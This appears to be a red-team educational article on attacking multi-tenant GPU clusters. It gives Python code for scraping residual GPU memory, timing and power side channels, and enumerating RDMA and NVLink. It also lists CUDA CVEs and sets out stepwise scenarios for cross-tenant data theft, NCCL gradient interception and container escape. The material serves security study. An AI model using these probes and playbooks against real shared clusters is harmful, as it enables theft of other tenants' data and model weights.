Attacking GPU Compute Clusters
Expert-level analysis of attacks against GPU compute clusters used for ML training and inference, including side-channel attacks on GPU memory, CUDA runtime exploitation, multi-tenant isolation failures, and RDMA network attacks.
GPU compute clusters are the backbone of modern ML infrastructure. Organizations spend millions on NVIDIA DGX, AMD Instinct, and cloud GPU instances for training and serving models. The security of these clusters is a critical concern, yet GPU hardware and its associated software stack were designed primarily for performance, not isolation. This creates exploitable gaps that red teams can leverage to access other tenants' data, extract model weights, and disrupt training runs.
GPU Memory Architecture and Attack Surface
NVIDIA GPU Memory Hierarchy
Understanding the GPU memory hierarchy is essential for identifying data leakage opportunities:
┌──────────────────────────────────────────────────┐
│ GPU Device │
│ │
│ ┌──────────────────────────────────────────────┐ │
│ │ Global Memory (HBM) │ │
│ │ ┌─────────────┐ ┌─────────────────────────┐│ │
│ │ │ Model Weights│ │ Activations / KV Cache ││ │
│ │ └─────────────┘ └─────────────────────────┘│ │
│ │ ┌─────────────┐ ┌─────────────────────────┐│ │
│ │ │ Gradients │ │ Optimizer State ││ │
│ │ └─────────────┘ └─────────────────────────┘│ │
│ └──────────────────────────────────────────────┘ │
│ │
│ ┌────────────┐ ┌────────────┐ ┌────────────┐ │
│ │ SM 0 │ │ SM 1 │ │ SM N │ │
│ │ ┌────────┐ │ │ ┌────────┐ │ │ ┌────────┐ │ │
│ │ │Shared │ │ │ │Shared │ │ │ │Shared │ │ │
│ │ │Memory │ │ │ │Memory │ │ │ │Memory │ │ │
│ │ └────────┘ │ │ └────────┘ │ │ └────────┘ │ │
│ │ ┌────────┐ │ │ ┌────────┐ │ │ ┌────────┐ │ │
│ │ │L1 Cache│ │ │ │L1 Cache│ │ │ │L1 Cache│ │ │
│ │ └────────┘ │ │ └────────┘ │ │ └────────┘ │ │
│ └────────────┘ └────────────┘ └────────────┘ │
│ │
│ ┌──────────────────────────────────────────────┐ │
│ │ L2 Cache (Shared) │ │
│ └──────────────────────────────────────────────┘ │
└──────────────────────────────────────────────────┘
Uninitialized Memory Exploitation
GPU memory is not automatically cleared between kernel launches or between processes sharing a GPU. This is the most accessible attack vector in multi-tenant environments:
import torch
import numpy as np
def probe_gpu_memory(allocation_size_mb: int = 512, num_probes: int = 10):
"""
Probe GPU memory for residual data from previous allocations.
In multi-tenant environments, this may contain fragments of
other users' model weights, activations, or input data.
"""
findings = []
for probe_idx in range(num_probes):
# Allocate without initialization — reads whatever is in memory
tensor = torch.empty(
allocation_size_mb * 1024 * 1024 // 4, # float32 elements
dtype=torch.float32,
device="cuda"
)
# Analyze contents for non-zero patterns
nonzero_ratio = (tensor != 0).float().mean().item()
value_range = (tensor.min().item(), tensor.max().item())
# Check for structured patterns (model weights have characteristic distributions)
std = tensor.std().item()
mean = tensor.abs().mean().item()
if nonzero_ratio > 0.01: # More than 1% non-zero indicates residual data
findings.append({
"probe": probe_idx,
"nonzero_ratio": nonzero_ratio,
"value_range": value_range,
"std": std,
"mean_abs": mean,
"likely_content": classify_residual_data(std, mean),
})
del tensor
torch.cuda.empty_cache()
return findings
def classify_residual_data(std: float, mean_abs: float) -> str:
"""Heuristic classification of residual GPU memory contents."""
if 0.01 < std < 0.1 and mean_abs < 0.05:
return "likely_model_weights (small initialization)"
elif 0.1 < std < 2.0:
return "likely_activations_or_gradients"
elif std > 10.0:
return "likely_optimizer_state (Adam momentum/variance)"
elif mean_abs < 1e-6:
return "likely_zeroed_or_sparse"
else:
return "unknown_structured_data"Side-Channel Attacks on GPU Workloads
Timing Side Channels
GPU kernel execution times leak information about the data being processed:
import torch
import time
def timing_side_channel_probe(target_gpu: int = 0):
"""
Measure GPU kernel execution timing to infer characteristics
of co-located workloads. Execution time correlates with:
- Model size (number of parameters)
- Batch size (number of inputs processed)
- Sequence length (for transformer models)
- Sparsity patterns in data
"""
torch.cuda.set_device(target_gpu)
timings = []
for _ in range(1000):
# Launch a small probe kernel
probe = torch.randn(64, 64, device="cuda")
torch.cuda.synchronize()
start = time.perf_counter_ns()
result = torch.matmul(probe, probe)
torch.cuda.synchronize()
end = time.perf_counter_ns()
timings.append(end - start)
timings = np.array(timings)
# Timing variance indicates resource contention from co-located workloads
return {
"mean_ns": np.mean(timings),
"std_ns": np.std(timings),
"p99_ns": np.percentile(timings, 99),
"bimodal": detect_bimodal_distribution(timings),
"contention_detected": np.std(timings) > np.mean(timings) * 0.1,
}
def detect_bimodal_distribution(data: np.ndarray) -> bool:
"""Bimodal timing suggests batch processing boundaries in co-located workload."""
from scipy import stats
_, p_value = stats.normaltest(data)
return p_value < 0.001Power and Thermal Side Channels
GPU power consumption and thermal readings are accessible through management interfaces and correlate with workload characteristics:
def monitor_gpu_power_channel(duration_seconds: int = 60, sample_rate_hz: int = 10):
"""
Monitor GPU power consumption as a side channel.
Power draw patterns reveal:
- Training vs. inference workload type
- Batch processing cadence
- Model architecture characteristics
"""
import subprocess
import time
readings = []
interval = 1.0 / sample_rate_hz
for _ in range(duration_seconds * sample_rate_hz):
# nvidia-smi provides power and utilization data
result = subprocess.run(
["nvidia-smi",
"--query-gpu=power.draw,utilization.gpu,temperature.gpu,memory.used",
"--format=csv,noheader,nounits"],
capture_output=True, text=True
)
if result.returncode == 0:
values = result.stdout.strip().split(", ")
readings.append({
"timestamp": time.time(),
"power_w": float(values[0]),
"util_pct": float(values[1]),
"temp_c": float(values[2]),
"mem_used_mb": float(values[3]),
})
time.sleep(interval)
return analyze_power_patterns(readings)
def analyze_power_patterns(readings: list) -> dict:
"""Extract workload characteristics from power consumption patterns."""
powers = [r["power_w"] for r in readings]
utils = [r["util_pct"] for r in readings]
# Detect periodic patterns (training loop cadence)
from scipy.signal import find_peaks
peaks, properties = find_peaks(powers, height=np.mean(powers))
if len(peaks) > 2:
intervals = np.diff(peaks)
cadence = np.median(intervals) / 10 # Convert to seconds
return {
"workload_type": "training" if cadence > 1.0 else "inference",
"batch_cadence_seconds": cadence,
"peak_power_w": max(powers),
"avg_power_w": np.mean(powers),
}
return {"workload_type": "inference_or_idle", "avg_power_w": np.mean(powers)}| Side Channel | Data Leaked | Accuracy | Requirements |
|---|---|---|---|
| Kernel timing | Model size, batch size, sequence length | Medium | Co-located process on same GPU |
| Power analysis | Training cadence, workload type | High | nvidia-smi access |
| Memory bandwidth | Data transfer patterns, model loading | Medium | Performance counter access |
| PCIe traffic | Host-device data movement patterns | Low | PCIe monitoring capability |
| Thermal patterns | Sustained vs. burst compute | Low | Temperature sensor access |
Multi-Tenant GPU Isolation Mechanisms
NVIDIA Multi-Instance GPU (MIG)
MIG (Multi-Instance GPU) provides the strongest available isolation for GPU multi-tenancy:
def assess_mig_isolation(gpu_index: int = 0):
"""Assess MIG partition isolation on NVIDIA A100/H100 GPUs."""
import subprocess
import json
findings = []
# List MIG instances
result = subprocess.run(
["nvidia-smi", "mig", "-lgi", "-i", str(gpu_index)],
capture_output=True, text=True
)
findings.append({"mig_instances": result.stdout})
# Check MIG mode status
result = subprocess.run(
["nvidia-smi", "--query-gpu=mig.mode.current", "--format=csv,noheader",
"-i", str(gpu_index)],
capture_output=True, text=True
)
mig_enabled = "Enabled" in result.stdout
if not mig_enabled:
findings.append({
"severity": "HIGH",
"finding": "MIG not enabled on multi-tenant GPU",
"impact": "No hardware isolation between tenants",
})
# Even with MIG, check for shared resources
findings.append({
"note": "MIG isolates compute and memory but shares: "
"PCIe bus, NVLink, video encoder/decoder, "
"GPU management processor",
})
return findingsNVIDIA Multi-Process Service (MPS)
MPS (Multi-Process Service) provides performance benefits but weaker isolation:
| Isolation Mechanism | Compute Isolation | Memory Isolation | Fault Isolation | Performance Overhead |
|---|---|---|---|---|
| MIG | Hardware-partitioned SMs | Separate memory partitions | Full -- crash contained | 0% (dedicated resources) |
| MPS | Shared SMs, time-multiplexed | Shared address space | None -- one crash kills all | Low |
| Time-slicing | Round-robin scheduling | No isolation | None | Medium (context switching) |
| vGPU | Hypervisor-mediated | Hypervisor-enforced | Full | 5-15% |
RDMA and Interconnect Attacks
InfiniBand and RoCE Exploitation
High-performance GPU clusters use RDMA for inter-node communication during distributed training:
def enumerate_rdma_endpoints():
"""
Enumerate RDMA-capable network interfaces and endpoints.
RDMA traffic bypasses the kernel network stack, meaning
standard firewall rules and network policies do not apply.
"""
import subprocess
findings = []
# Check for RDMA devices
result = subprocess.run(["ibv_devices"], capture_output=True, text=True)
if result.returncode == 0:
findings.append({
"finding": "RDMA devices present",
"devices": result.stdout,
"severity": "INFO",
})
# Check for InfiniBand subnet manager
result = subprocess.run(["ibstat"], capture_output=True, text=True)
if result.returncode == 0:
findings.append({
"finding": "InfiniBand status",
"status": result.stdout,
})
# Enumerate RDMA connections
result = subprocess.run(
["rdma", "resource", "show", "cm_id"],
capture_output=True, text=True
)
if result.returncode == 0:
findings.append({
"finding": "Active RDMA connections",
"connections": result.stdout,
"note": "These connections bypass kernel network stack and firewalls",
})
# Check for GPUDirect RDMA capability
result = subprocess.run(
["nvidia-smi", "nvlink", "--status"],
capture_output=True, text=True
)
if result.returncode == 0:
findings.append({
"finding": "NVLink status (GPUDirect capable)",
"status": result.stdout,
})
return findingsNVLink and NVSwitch Attacks
In multi-GPU systems (DGX, HGX), NVLink provides direct GPU-to-GPU memory access:
def probe_nvlink_topology():
"""
Map NVLink topology to identify potential cross-GPU
data access paths. NVLink enables GPUDirect which allows
one GPU to directly read/write another GPU's memory.
"""
import subprocess
result = subprocess.run(
["nvidia-smi", "topo", "-m"],
capture_output=True, text=True
)
topology = result.stdout
# Parse topology matrix for NVLink connections
# NV# indicates NVLink connection with # links
# SYS indicates cross-socket (slower)
# PHB indicates same PCIe host bridge
return {
"topology": topology,
"note": "GPUs connected via NVLink can perform direct memory "
"access (peer-to-peer). If GPU 0 and GPU 1 are NVLink-connected "
"and run different tenants' workloads, a CUDA program on GPU 0 "
"can potentially read GPU 1's memory via cuMemcpyPeer.",
}CUDA Runtime Exploitation
Driver and Runtime Vulnerabilities
The CUDA software stack presents a significant attack surface:
| Component | Vulnerability Class | Example CVEs | Impact |
|---|---|---|---|
| NVIDIA Kernel Driver | Privilege escalation | CVE-2024-0071, CVE-2024-0074 | Host compromise from container |
| CUDA Runtime | Memory corruption | CVE-2023-31021 | Code execution in GPU context |
| cuDNN | Buffer overflow | Various | Arbitrary code execution |
| NCCL | Unauthenticated access | Design issue | Distributed training data interception |
| nvidia-persistenced | Local privilege escalation | CVE-2024-0090 | Root access from GPU user |
def assess_cuda_attack_surface():
"""Enumerate CUDA stack components and known vulnerability exposure."""
import subprocess
components = {}
# Driver version
result = subprocess.run(
["nvidia-smi", "--query-gpu=driver_version", "--format=csv,noheader"],
capture_output=True, text=True
)
components["driver_version"] = result.stdout.strip()
# CUDA version
result = subprocess.run(
["nvcc", "--version"], capture_output=True, text=True
)
components["cuda_version"] = result.stdout
# Check for known vulnerable driver versions
driver_ver = components["driver_version"]
known_vulnerable = {
"535.104": ["CVE-2024-0071"], # Example
"535.86": ["CVE-2023-31021"],
}
for vuln_ver, cves in known_vulnerable.items():
if driver_ver.startswith(vuln_ver):
components["vulnerabilities"] = cves
return componentsCluster-Level Attack Scenarios
Scenario 1: Cross-Tenant Data Extraction
1. Attacker obtains legitimate access to a GPU instance in a shared cluster
2. Probe uninitialized GPU memory for residual data from previous tenant
3. Use timing side channels to determine when co-located workload processes batches
4. Allocate and read GPU memory immediately after co-located workload releases it
5. Reconstruct model weights or training data fragments from recovered memory
Scenario 2: Distributed Training Interception
1. Gain access to the training cluster network (InfiniBand or RoCE fabric)
2. Enumerate NCCL communication endpoints (default: no authentication)
3. Join the NCCL communication ring by impersonating a training worker
4. Intercept gradient updates transmitted between nodes during allreduce operations
5. Reconstruct model updates and potentially training data from gradient information
Scenario 3: GPU-Assisted Container Escape
1. From within a GPU-enabled container, access /dev/nvidia* device files
2. Use GPU memory mapping to probe host memory regions accessible through DMA
3. Exploit NVIDIA driver vulnerabilities for kernel-level privilege escalation
4. Use GPU DMA capabilities to read or write host memory outside container boundaries
5. Establish persistence through GPU firmware or driver-level modifications
Related Topics
- Attacking AI Deployments -- general deployment infrastructure attacks
- Kubernetes Security for ML Workloads -- Kubernetes-specific ML infrastructure security
- Infrastructure Exploitation -- broader infrastructure exploitation techniques
- Model Supply Chain Risks -- model-level supply chain attacks
- Distributed Training Attacks -- attacking the training process itself
References
- Naghibijouybari et al., "Rendered Insecure: GPU Side Channel Attacks are Practical" (2018) - Foundational research demonstrating practical GPU side-channel attacks across co-located processes
- Wei et al., "Leaky DNN: Stealing Deep-Learning Model Secret with GPU Context-Switching Side-Channel" (2020) - GPU context switching as a model extraction side channel
- NVIDIA Multi-Instance GPU User Guide (2025) - Official MIG documentation covering partition configurations and isolation guarantees
- NVIDIA Container Toolkit Security Best Practices (2025) - Security guidance for GPU containers including device isolation
- Hu et al., "Security Analysis of RDMA-based Data Center Networks" (2023) - RDMA security analysis in data center environments
Why are standard Kubernetes network policies insufficient for securing GPU cluster communication during distributed training?